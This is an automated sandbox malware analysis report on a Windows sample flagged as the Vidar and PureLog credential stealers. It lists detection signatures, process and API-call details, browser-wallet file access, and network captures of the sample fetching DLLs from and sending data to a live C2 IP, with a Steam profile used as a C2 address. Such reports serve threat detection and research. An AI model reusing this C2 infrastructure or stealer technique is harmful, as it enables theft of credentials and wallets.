Windows Analysis Report
SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe

Overview

General Information

Sample name: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe
Analysis ID: 1429063
MD5: 7f1e688e77760ad29c560404a2fb9d2f
SHA1: 7c06e05c8e13d01df26653cbe12695af139c5854
SHA256: 086bcb65380fa0e4d23c07fbff58863949f8158b87d07cd6eac6485d99b3bf0d
Tags: exe
Infos:

Detection

PureLog Stealer, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected PureLog Stealer
Yara detected Vidar
Yara detected Vidar stealer
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Searches for specific processes (likely to inject)
Sigma detected: Silenttrinity Stager Msbuild Activity
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe (PID: 6308 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe" MD5: 7F1E688E77760AD29C560404A2FB9D2F)
    • MSBuild.exe (PID: 4076 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup
{"C2 url": ["https://steamcommunity.com/profiles/76561199673019888"]}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_Vidar_2 | Yara detected Vidar | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.1750736116.000000000338D000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000002.1752049015.0000000004381000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
00000000.00000002.1760730113.0000000005D30000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |

Source | Rule | Description | Author | Strings
0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.4d48a78.10.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.439ab30.4.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.439ab30.4.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
1.2.MSBuild.exe.400000.0.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.4cf8a58.3.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |

                        System Summary

                        Source: Network Connection Author: Kiran kumar s, oscd.community: Data: DestinationIp: 23.76.43.59, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 4076, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49731
                        No Snort rule has matched

                        AV Detection

                        Source: 00000000.00000002.1750736116.000000000338D000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199673019888"]}
                        Source: https://37.27.87.155/1Virustotal: Detection: 7%
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe ReversingLabs: Detection: 23%
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe Virustotal: Detection: 26%
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe Joe Sandbox ML: detected
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00406FD0 CryptUnprotectData,LocalAlloc,LocalFree,1_2_00406FD0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00409230 memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,PK11_FreeSlot,lstrcat,PK11_FreeSlot,lstrcat,1_2_00409230
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00411720 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,1_2_00411720
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00406F50 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,1_2_00406F50
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAC6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,1_2_6CAC6C80
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC1A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,1_2_6CC1A9A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC144C0 PK11_PubEncrypt,1_2_6CC144C0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC14440 PK11_PrivDecrypt,1_2_6CC14440
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBE4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,1_2_6CBE4420
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC625B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,1_2_6CC625B0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBFE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,1_2_6CBFE6E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC1A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,1_2_6CC1A650
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBF8670 PK11_ExportEncryptedPrivKeyInfo,1_2_6CBF8670
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: unknown HTTPS traffic detected: 23.76.43.59:443 -> 192.168.2.4:49731 version: TLS 1.2
                        Source: unknown HTTPS traffic detected: 37.27.87.155:443 -> 192.168.2.4:49732 version: TLS 1.2
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: mozglue.pdbP source: MSBuild.exe, 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
                        Source: Binary string: freebl3.pdb source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
                        Source: Binary string: freebl3.pdbp source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
                        Source: Binary string: nss3.pdb@ source: MSBuild.exe, 00000001.00000002.2157065246.000000006CCEF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
                        Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.0000000004209000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1761810556.0000000005F50000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.0000000004209000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1761810556.0000000005F50000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.1.dr, vcruntime140.dll.1.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.1.dr, msvcp140[1].dll.1.dr
                        Source: Binary string: protobuf-net.pdbSHA256}Lq source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1761316124.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.0000000004209000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.000000000414D000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: nss3.pdb source: MSBuild.exe, 00000001.00000002.2157065246.000000006CCEF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
                        Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: MSBuild.exe, 00000001.00000002.2148753612.0000000019948000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2139609144.00000000139D5000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.1.dr
                        Source: Binary string: mozglue.pdb source: MSBuild.exe, 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
                        Source: Binary string: protobuf-net.pdb source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1761316124.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.0000000004209000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.000000000414D000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: softokn3.pdb source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0040B030 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,1_2_0040B030
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_004011E0 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_004011E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0040D320 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040D320
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_004164A0 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,strtok_s,memset,lstrcat,strtok_s,PathMatchSpecA,wsprintfA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,DeleteFileA,FindNextFileA,FindClose,1_2_004164A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00417550 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00417550
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0040A530 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_0040A530
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00416CF0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_00416CF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00417140 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,1_2_00417140
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0040A980 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040A980
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_004168E0 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen,1_2_004168E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

                        Networking

                        Source: Malware configuration extractor URLs: https://steamcommunity.com/profiles/76561199673019888
                        Source: global traffic HTTP traffic detected: GET /profiles/76561199673019888 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
                        Source: Joe Sandbox View IP Address: 37.27.87.155 37.27.87.155
                        Source: Joe Sandbox View IP Address: 23.76.43.59 23.76.43.59
                        Source: Joe Sandbox View JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                        Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                        Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 37.27.87.155 Connection: Keep-Alive Cache-Control: no-cache
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGHIECGCBKFHIEBGHDBK User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 37.27.87.155 Content-Length: 279 Connection: Keep-Alive Cache-Control: no-cache
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFCBKKKJJJKKEBGDAFID User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 37.27.87.155 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKFBAKFCBFHIJJJJDBFC User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 37.27.87.155 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFCBFBGDBKJKECAAKKFH User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 37.27.87.155 Content-Length: 6237 Connection: Keep-Alive Cache-Control: no-cache
                        Source: global traffic HTTP traffic detected: GET /sqln.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 37.27.87.155 Connection: Keep-Alive Cache-Control: no-cache
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGIIIECBGDHJJKFIDAKJ User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 37.27.87.155 Content-Length: 4677 Connection: Keep-Alive Cache-Control: no-cache
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGHJJDGHCBGDHIECBGID User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 37.27.87.155 Content-Length: 1529 Connection: Keep-Alive Cache-Control: no-cache
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IEHIIIJDAAAAAAKECBFB User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 37.27.87.155 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHDHCAAKECFIDHIEBAKF User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 37.27.87.155 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
                        Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 37.27.87.155 Cache-Control: no-cache
                        Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 37.27.87.155 Cache-Control: no-cache
                        Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 37.27.87.155 Cache-Control: no-cache
                        Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 37.27.87.155 Cache-Control: no-cache
                        Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 37.27.87.155 Cache-Control: no-cache
                        Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 37.27.87.155 Cache-Control: no-cache
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFCBFBGDBKJKECAAKKFH User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 37.27.87.155 Content-Length: 1145 Connection: Keep-Alive Cache-Control: no-cache
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KECFIDGCBFBAKEBFBKFB User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 37.27.87.155 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGCFBFBGHDGDAKECAKJE User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 37.27.87.155 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIEHJEHDBGHIDGDGHCBG User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 37.27.87.155 Content-Length: 453 Connection: Keep-Alive Cache-Control: no-cache
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFCBFBGDBKJKECAAKKFH User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 37.27.87.155 Content-Length: 139465 Connection: Keep-Alive Cache-Control: no-cache
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBAFCAKEHDHDHIDHDGDH User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 37.27.87.155 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDHCBAEHJJJKKFIDGHJE User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 37.27.87.155 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
                        Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
                        Source: unknown TCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00404500 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 1_2_00404500
                        Source: global traffic HTTP traffic detected: GET /profiles/76561199673019888 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
                        Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 37.27.87.155 Connection: Keep-Alive Cache-Control: no-cache
                        Source: global traffic HTTP traffic detected: GET /sqln.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 37.27.87.155 Connection: Keep-Alive Cache-Control: no-cache
                        Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 37.27.87.155 Cache-Control: no-cache
                        Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 37.27.87.155 Cache-Control: no-cache
                        Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 37.27.87.155 Cache-Control: no-cache
                        Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 37.27.87.155 Cache-Control: no-cache
